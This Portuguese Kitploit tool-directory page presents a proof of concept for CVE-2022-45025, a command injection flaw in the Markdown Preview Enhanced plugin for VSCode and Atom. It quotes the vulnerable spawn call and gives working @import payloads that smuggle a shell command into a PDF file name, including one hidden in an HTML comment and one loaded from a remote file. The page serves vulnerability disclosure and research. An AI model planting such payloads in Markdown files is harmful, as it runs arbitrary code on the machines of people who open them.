Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-45025 — [PoC] Injeção de comandos via importação de PDF no Markdown Preview Enhanced (VSCode, Atom) | Kitploit
Ferramentas/GitHubGitHub/yuriisanin/cve-2022-45025
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Injeção de comandos via importação de PDF no Markdown Preview Enhanced (VSCode, Atom)

Ver Repositório
8817há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-45025

Injeção de comando via importação de PDF no Markdown Preview Enhanced (VSCode, Atom)

Descrição

A biblioteca de ferramentas Mume para Markdown era vulnerável a injeção de comandos devido ao uso do comando spawn com a opção {shell: true}. Isso poderia permitir que um atacante obtivesse execução arbitrária de código ao enganar a vítima para que abrisse um arquivo Markdown especialmente elaborado usando VSCode ou Atom. A biblioteca alimenta o plugin Markdown Preview Enhanced tanto para VSCode quanto para Atom.

Trecho de código vulnerável:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Prova de Conceito

O seguinte documento Markdown permite que um atacante execute comandos arbitrários:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Alternativamente, o payload poderia ser executado a partir de uma fonte externa:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DEMO para VSCode e Atom no YouTube.

vscode-rce-poc-gif

Suporte

Você pode me seguir no Twitter, GitHub ou YouTube.

Baixar ferramenta